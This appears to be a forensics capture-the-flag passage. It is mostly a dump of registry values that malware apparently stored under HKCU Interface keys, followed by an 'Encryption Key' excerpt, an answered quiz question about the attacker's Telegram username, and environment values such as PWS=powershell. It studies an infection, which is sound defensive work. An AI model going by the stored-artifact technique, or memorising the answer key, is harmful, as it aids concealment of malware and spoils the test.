HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32;(default)=65b871533d42cb86103d989272062032
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32;(default)=29ad59dbaeb3f99ac3dd818967cda044
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32;(default)=577a18f10b981a5e57b6d23ee1c28141
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\ProxyStubClsid32;(default)=aafd28ba907b773bf34eeedb8065ab4b
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32;(default)=bfdf6eb9a63426cb0411453f56de9df5
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\ProxyStubClsid32;(default)=a20dc85e1dc43ece0b176db9bdb40f24
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32;(default)=d2e5acd32727890264374e2e059474f2
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32;(default)=1b0ed99ec099205c59d513967c906866
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32;(default)=8066ee26eeb0ae447fc964986fe23429
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32;(default)=17a4baa5bbd1c2fe8376816f12dcc8f7
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32;(default)=b66486162f8179b176b777bfb8eab07d
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\ProxyStubClsid32;(default)=4d2b3394aff7e40d627a143cf0d86a35
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32;(default)=d968988714f691126f48b550a28722f4
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32;(default)=eb8ea446e269977ccc397114b644d2e8
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32;(default)=15597e057b09fb2968556aab64105d8a
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32;(default)=ff2d60446a157e77fac170afe902d4f0
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32;(default)=c5d5a9dfab84c843b1c941310a7acecb
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32;(default)=b026752dffaffe245053bbd6cb9eb495
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\ProxyStubClsid32;(default)=6355f96a451bb0159579fb188deffb84
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\ProxyStubClsid32;(default)=aeae1b73d31d762cd531ed97dad51e06
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\ProxyStubClsid32;(default)=97c3d178862e5badccecad991e64d7d8
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32;(default)=8d893b0aee2994c3b435df21c35201ee
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32;(default)=19fad085fc5fafea516aa3f346003ccf
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32;(default)=e538197da2b1a75b60b79d32a8e304e4
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32;(default)=8a4762ac55da1262265ede7e1218c74c
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32;(default)=e5f6ace32f873934f980090c5565c59b
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32;(default)=9d4eb080145710fb12299dc551feb7b3
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\ProxyStubClsid32;(default)=61b422fefdb739d2c1187b0a38d10c6e
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\ProxyStubClsid32;(default)=0ebcb1eaf90b2981ae0269e6f306b3ec
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32;(default)=dfc8d6264de96b89d64e0c0d59bb9c5f
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32;(default)=62a16df063a0a66281b1511a09a1ad51
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\ProxyStubClsid32;(default)=70631b6dba447633544ab56ba6ff80d2
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32;(default)=792ee813cd83e45977de009c4c5a0118
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\ProxyStubClsid32;(default)=e750d12a17193130f2bde84333b1948c
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32;(default)=2ab0f49154e3279782ad3449b4fe3fee
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32;(default)=a8df6417e5122caaf5df9b59b9181a38
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32;(default)=e3a4bf265945970c726b78892c5007c2
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32;(default)=91a2ce65aa1df0fcb3e38e406d13bdf7
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\ProxyStubClsid32;(default)=76dcd2c92d818296fd1b641842db9745
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32;(default)=5cad71c84aa14a8bdf370f97f7cd5211
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32;(default)=30631a1f8fa8ebeb72c05a87e6737663
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ProxyStubClsid32;(default)=34381835f9c37367dee2efc6eaf29f0d
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ProxyStubClsid32;(default)=87d76ab371ca4cc6183d3e3d9d7cff4d
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib;(default)=2667ede11b66c4a0648b249492d7fa79
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib;(default)=49c292a39edd1c8e1901306bf48f8313
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib;(default)=3f5c0c9bc20bdb0bf3aca0a033c92be5
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib;(default)=4c45868e2893ed8f89ee09622a40486d
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib;(default)=07e5348198a616c7262c7864b5e3d52b
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib;(default)=569c5c61de7c4f645eab1c3fd13e8bf1
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\TypeLib;(default)=ee6f335e6594cfde9b61a1875fa18f6a
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib;(default)=058649c7a5665b7f4f3d4df1cfdfda61
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib;(default)=f20cf4b24a7277507553711cbf517179
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib;(default)=d161b5b88fb911e3dbbbda66eaf90407
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib;(default)=d4b05388f7997732f147e2f93f8b97cd
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib;(default)=5f8b0750f9cb740db98e20712321b7a9
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib;(default)=a9baa7651e67b3354c04eb5d782413d0
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib;(default)=b38d7f91c723d1525093716dca57f2e3
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib;(default)=0b322c494244cc2404427bbda9448d70
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib;(default)=c1695ec40ea6b6459e2adb1251e0f362
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib;(default)=8ed7c45f9f23768f5045e3c4e563f897
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib;(default)=622d82e77429b21100b6487f5f01c15f
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib;(default)=50f1075f9aaa12fd8449c51f7f1f287b
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TypeLib;(default)=bf511dbe348adf9b1b42efb0d3fa97ce
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib;(default)=c239d8075d9ccfae6d3c9979703a8b66
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib;(default)=51e51a4ab90bea54ea1797795814290b
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\TypeLib;(default)=5415d3e628934cca07e1fcb5fd0c0def
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib;(default)=e163cb643c00a189023ec9c57178d02c
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib;(default)=0601f20a649c6dce48d700e234eae7d5
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\TypeLib;(default)=e23a0947804f0520a4e91ab2fd1e7325
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib;(default)=c7eff082126124b1d521238491d8d97f
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib;(default)=98c64ef583ef036817cce7bde4b515bb
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\TypeLib;(default)=8480b1d3046304060fcaf4610bd0338b
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib;(default)=fc34ea214fc5bfa5a324444d5eea8fd8
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib;(default)=ab3735f1a7a477462ee033e55aac9db5
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib;(default)=f5f2d45f4e11d8962af62c04ac2906ec
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib;(default)=aa27ac9a8b1e3491ed1dd06f625e00cc
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib;(default)=fd1ee547b62d261187f80d10491980f3
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;(default)=6ca24d7c7f6f6465afb82dacd1b0c71f
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\TypeLib;(default)=5822bab69600216b4c2b37186fc2eaca
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\TypeLib;(default)=a6435b2b59284689e8e67a5127a31ab8
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\TypeLib;(default)=6c45ccbdb78bbfc2f626577712a126aa
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib;(default)=f435d809bc626804047ebfbf6bb2e7ce
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib;(default)=fc4fbf90e849987daebf93e2929f6cba
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib;(default)=e54f69a5084a30d212d107adf47427aa
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\TypeLib;(default)=f3e2aa87814de9116d7f8facb3db703b
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib;(default)=5f4dca7129e7f26a0fbafee8cdca0d25
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib;(default)=a24ac9f1114b8a944af4edc815efc749
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\TypeLib;(default)=d47c2aba1836ba60d48cde7661f591a6
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\TypeLib;(default)=3068f9bc80a4710ca4deee308c6e2e66
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib;(default)=d74fb3cb2c90a6f0b59c5edd9efb4966
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib;(default)=d00a3e414fb504197016ef87c1a1e347
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\TypeLib;(default)=7603eee5aa9c81270db4ec1fd9dee44c
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib;(default)=9cb326faa2f3d51a45bfdb02dd0800a8
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\TypeLib;(default)=df7cc6dc04a77d6539c2f5e7358dfe33
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib;(default)=9afdebc06dc62cc7f98aa22133f9f5c6
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib;(default)=03baa1ddbf7720ec36eb8947c1512125
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib;(default)=1e39c4459f7f4143a4318d465867f1f0
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib;(default)=efe3f84d993b0bb590edc6c973e6fac8
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\TypeLib;(default)=882ab3baf3929c269aca272f4118b9c5
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib;(default)=d236b70a49e5e9e54570cef9c7e8549d
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib;(default)=7c42a95b1914937bac6487d2bcaf9166
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib;(default)=2dffe2eb78e3f72de5cb238eb1aed6f0
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib;(default)=b5e544a80d6c6fab9997462bb88317ad
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib;Version=8fe95f973454ad32609a7b460ab268d4
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib;Version=efd157f757a5b2e5ff8f0970c1d827f1
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib;Version=1a03b4810cd2a5a5bcddb32d29f055ee
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib;Version=117638295ef66dddf6e7499dfbd928d7
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib;Version=baaebf1ab75f315b686dca5879baedfb
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib;Version=bf6c1e582cbe2145ead10e3f6b80a13a
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6}\TypeLib;Version=5c9898176ca63482dff2790ac596f407
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib;Version=418fe8a0df8a0ce8173820e21a1763e0
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib;Version=21339661a43f75ec3ea31676a671d93e
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib;Version=35d4da281f6c6d2aeaf30d139d2c733a
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib;Version=255bf997ead39dbc1ea0b9a715ee6b24
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib;Version=31b38fd4028e342d44e1be0b1d6f9a4a
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib;Version=7aab3151fb4e0dbec2321fa8f1732300
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib;Version=b5c261075e681b6920305af6bcb4c40e
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib;Version=9e550eace4e87545d9a24227140e47a4
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib;Version=cc0d808a6f4190e755e9d51bdefe8e56
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib;Version=02b5b1b81f6cf07be37ffc8f5588e2d0
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib;Version=4ec48b70d0c9e8011dd97a962dddf411
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib;Version=a56aebb2a1bf6d9ee3c0b7c9f77a5abc
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TypeLib;Version=c89586a0937032879a850bbfdd026667
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib;Version=e6f1e2e75d4e23c1d643ba35e12a3d56
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib;Version=78e90dd0cbb761bf3f3914e76103d9f5
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786}\TypeLib;Version=5dd7f9f7ef19a105935305bc014c50d4
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib;Version=95129b726812d4ef347ffd77219914dc
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib;Version=be00661a7771c6e22188f6be3a3d80cc
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\TypeLib;Version=9122d8e0ad502af25e0f5e47561fdadc
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib;Version=e81199a0ae40e50947547abdfd4ac568
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib;Version=45ebdaabfb05d52f1ea61eb7b2b1f53e
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8}\TypeLib;Version=e5b63c312392b4f4ce26c53bc63e6300
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib;Version=a0fc502a0ac1bab650ff2729a498438f
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib;Version=f0ceb2c24e290323ab59d83fff8fed21
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib;Version=ba08b928bf5e636e90f11b481d14e0d2
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib;Version=a91aeef61c9caa2ce64ae4948f1bad61
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib;Version=118c0885eda3631b0de82a8ad1f279a7
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;Version=e05c741a11236c3c753810b355c44b53
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}\TypeLib;Version=707564213c5cf1439014e684a967bfc2
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB}\TypeLib;Version=aa8c1d5ee7465a4e16992cbd10beb1a1
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37}\TypeLib;Version=a68a22d6c15772218561a3b03b37bbd6
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib;Version=b7d08f3ee5fc1e2f2c1e0b97c01ab529
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib;Version=6b12606d7d2ed40e4c61b47dd2b194f2
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib;Version=a20f4a434d9b7fd4fc3b8ab57805281d
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\TypeLib;Version=960c44f50ccfadda18048b8cfee4538d
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib;Version=e959d53f94d28e744f408bb6e6c7f5ba
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib;Version=d2c71b23c782a4fe1d5880259039ee05
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D}\TypeLib;Version=61a379770cc1344dd96cd16410a4e942
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3}\TypeLib;Version=73b183a05dbceb221d4fee9130a862b8
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib;Version=1e1bda5f9b5796efcf3503ce62e35e31
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib;Version=75cc2e7ffcbc8287696cf498ed550d50
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93}\TypeLib;Version=f81d5c059e46a3f46605260954d8df90
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib;Version=0bb10c0dc30b514517b1b0959567e54d
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118}\TypeLib;Version=9b3cf1b03c7b2ff2b169a59e43b8e402
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib;Version=3aeea17fa8391ae6f77327995157bd19
HKEY_CURRENT_USER\software\classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib;Version=4d42f0f873cf170726d7a00a3e00cca0
HKEY_CURRENT_USER\software\classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib;Version=0f1678fbc4a762d47459830f37a1f5df
HKEY_CURRENT_USER\software\classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib;Version=55259ac1a82f2a96c89c1ad8836439c4
HKEY_CURRENT_USER\software\classes\Interface\{EB3EED27-BCC1-4E91-A65B-9C2AFB189F4F}\TypeLib;Version=4848a9617653eed03cab8011518d773f
HKEY_CURRENT_USER\software\classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib;Version=570e2dfa593169aa0fcfa183ffa8baa6
HKEY_CURRENT_USER\software\classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib;Version=8e1534343eb14fef76676c6910ddb9cc
HKEY_CURRENT_USER\software\classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib;Version=4476d9cc30459b799504bfd12131b648
HKEY_CURRENT_USER\software\classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib;Version=8c8f975d7cc97923d9c640c01990c798
Excerpt:
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib;(default)=6ca24d7c7f6f6465afb82dacd1b0c71f
Encryption Key:
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib
Value Name Value Type Data
(default) RegSz {BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}
Question 7:
[7/10] What is the attacker's Telegram username? (ie: username)
> Pirate_D_Mylan
[+] Correct!
Environment:
Value Name Value Type Data
OneDrive RegExpandSz C:\Users\IEUser\OneDrive
Path RegExpandSz C:\Users\IEUser\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\IEUser\AppData\Local\Programs\Python\Python37\;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
TEMP RegExpandSz %USERPROFILE%\AppData\Local\Temp
TMP RegExpandSz %USERPROFILE%\AppData\Local\Temp
PWS RegSz powershell
bid RegBinary CA-EA-55-6B-B7-FA-06-34-C6-3F-7C-12-F1-CC-AB-1A-5E-EC-CE-0F-45-15-31-47-FF-41-8D-71-E5-36-0E-CD-DC-E3-C2-29-B8-C6-EC-9A-92-21-6C-FF-F0-1E-A6-3C
hid RegBinary 93-B4-54-30-62-04-62-83-C3-2A-DD-E1-96-25-F6-6F-5C-9F-F9-FE-38-F2-A3-CB-8B-EF-06-08-80-FB-42-96-5E-13-2D-E3-27-67-5E-01-65-93-79-92-CA-8A-0B-D8
